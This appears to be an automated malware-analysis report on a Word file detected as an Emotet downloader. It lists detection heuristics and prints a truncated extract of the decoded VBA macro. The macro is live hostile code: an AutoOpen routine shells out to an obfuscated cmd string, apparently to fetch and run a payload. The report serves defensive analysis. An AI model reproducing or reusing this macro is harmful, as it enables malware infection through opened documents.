MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6884069-0, indicating a downloader functionality. The presence of an AutoOpen VBA macro, specifically detected by OLE_VBA_AUTOOPEN, suggests that the macro executes automatically upon opening the document. The script attempts to construct and execute a command, likely to download and run a secondary payload, which is a common Emotet behavior.
Heuristics 5
-
ClamAV: Doc.Downloader.Emotet-6884069-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6884069-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6007 bytes |
SHA-256: 62702e61b033b3d4619ea33b455d847960ee9380d4b3d6a4d7c779a4b5634614 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "FiEKhpQXZPD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
AppActivate 114306421
AppActivate CByte(157416543)
AppActivate Sztovk
AppActivate BCwkEl
Shell@ CVar("cm") + IIoQEJAGp + IcIDjuEOHj + jIfvzLIE + VakhwiFJAJ + UqplzjSb + fYuiTzw + MhQDnhSKn, 919844797 - 919844797
AppActivate Atn(14)
AppActivate YvViI
End Sub
Attribute VB_Name = "TIwfFIcHvUhE"
Function jIfvzLIE()
On Error Resume Next
AppActivate Sgn(35569 * 52149)
AppActivate 21
hBhFAlsscjo = "d" + " /V:ON/" + "C" + CStr(Chr(MGDOfzA + fZUDOrFpi + 34 + qJfWmYAwkiciKC + XfoBONGdWOtrK)) + "set 2e=q" + "uAuWjt" + "uwC" + "EDnvjD" + "hEPvi6e'z2"
AppActivate IfJtNY
AppActivate ChrW(ahFco)
NpTnXujdH = "$m+ GSo:{-" + "a4l)" + "K3" + "}B." + "g8\" + "yfx" + "dU1b" + "N=VF" + "R/k,pYX" + "r@s(c;&" + "&for"
AppActivate 3
AppActivate 2
kjRqloz = " %N in (63" + ",32,8" + ",22" + ",66," + "68" + ",16,22,3" + "8,38,29,26" + ",20," + "20,1"
AppActivate 6882
AppActivate CDbl(HnqIM * aEkaTT - adsBvF + CCnJzE)
XFOLYcw = "4,56,1" + "2,2" + "2,8,3" + "5,32,54,14" + ",2" + "2,70,6,29" + "," + "55,22," + "6,4" + "4" + ",4"
AppActivate Cos(jPwjP - NlrOo - bSTjK + zjKIi)
AppActivate 191631543
AppActivate NGvjaV
zUzTlCvKQDt = "," + "22,54,9," + "38," + "20,22,1" + "2,6,71,26,"
AppActivate Rnd(NBElO)
AppActivate Round(90703 / NYFzH)
AppActivate Sgn(1973 + piWmn)
BLbluzlIq = "20,68" + ",15,56," + "23,16,6,6" + ",63," + "33,60,60"
AppActivate 626
AppActivate Rnd(5)
AppActivate Sqr(VVIpY)
ZLVEfE = ",61,38,2" + "0,12,45" + ",22,66,20," + "4" + "5,20," + "4" + "4,70,32," + "27," + "6" + "0" + ",68,32" + ",53,53,57," + "67,"
AppActivate CByte(iCnSM)
AppActivate Round(1)
AppActivate Round(ANmOjU)
PjwFito = "16,6" + ",6,63,3" + "3,60,60,61" + ",12" + "," + "32,8,"
AppActivate Oct(24)
AppActivate Sgn(5)
AppActivate Chr(dKjSZJ)
SZiJMBMI = "20," + "12,45,36" + ",4" + "9,66,2" + "0,70," + "36," + "44" + ",3"
AppActivate Atn(8881 - 6112 * 70085 + ZONXpC)
AppActivate Log(dAnanV)
AppActivate CLng(LqHNlS + vzamX * 33584 + rIMiCJ)
iBBXdjoMYo = "2,66,4" + "5,60," + "40,40,2" + "2," + "24" + ",41,65,19," + "67,16," + "6,6,63,3"
AppActivate 8261
AppActivate CInt(CUuFss + QwAbcW)
mccjMFw = "3,60,60" + ",22,5" + "0,63,22,6" + "6,20,27" + ",22,12,6" + ",36" + ",38," + "44," + "7" + "0,32,44" + ",2" + "4,36,6" + "0,43,2,38"
AppActivate Log(6)
AppActivate KfiVs
zovCJCSw = ",70,67,16," + "6" + ",6" + ",63,33," + "60,60" + ",3" + "8" + ",36,49," + "3" + "6,54,6" + "6,20,0,7"
jIfvzLIE = hBhFAlsscjo + NpTnXujdH + kjRqloz + XFOLYcw + zUzTlCvKQDt + BLbluzlIq + ZLVEfE + PjwFito + SZiJMBMI + iBBXdjoMYo + mccjMFw + zovCJCSw
AppActivate Oct(JGiivu)
AppActivate Tan(8003)
AppActivate Round(ZdlXjD)
End Function
Function VakhwiFJAJ()
On Error Resume Next
AppActivate CBool(rUhTJ * sbASzf)
AppActivate CLng(IRDtA)
LXjYjwOM = ",22," + "51,22,68," + "20" + ",45,12,44" + ",70," + "32,27,60," + "59,6" + "4,20,59,15" + ",67,16,6" + ",6,63," + "3"
AppActivate CByte(kVsMo / cUHoiQ / iMNGh * wijikl)
AppActivate Sqr(60665 - hDArck)
AppActivate 9
BihhfJFs = "3,60," + "60,63" + ",38," + "36,6,45" + ","
AppActivate Log(PMmUKQ)
AppActivate 4
AppActivate ChrW(QYPjwI)
BujzGvwdtp = "22,6" + "8,51,22,6" + ",32,68" + ",68,36,4" + "4," + "70,32,2"
AppActivate 7
AppActivate WDrmk
fZilzYIXL = "7,60" + ",37,30," + "40,45" + ",65,6" + "5,25,4" + "3,23,44," + "31,63,38," + "20,6,6" + "9," + "23,67,2"
AppActivate 9
AppActivate CBool(611)
XcVzG = "3,39,71,26" + "," + "64,1" + "7,57,29,5" + "6"
AppActivate Rnd(47773 / TIFlNq)
AppActivate Atn(aXTfD)
UVorjpTQaf = ",29,23" + ",53,21,46" + ",2" + "3,7" + "1," + "26,31,52," + "68,5" + "6,26,22,12" + ",19,33" + ",6,22,27" + ",63" + ",28,23,4"
AppActivate CDate(SBvWu)
A
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.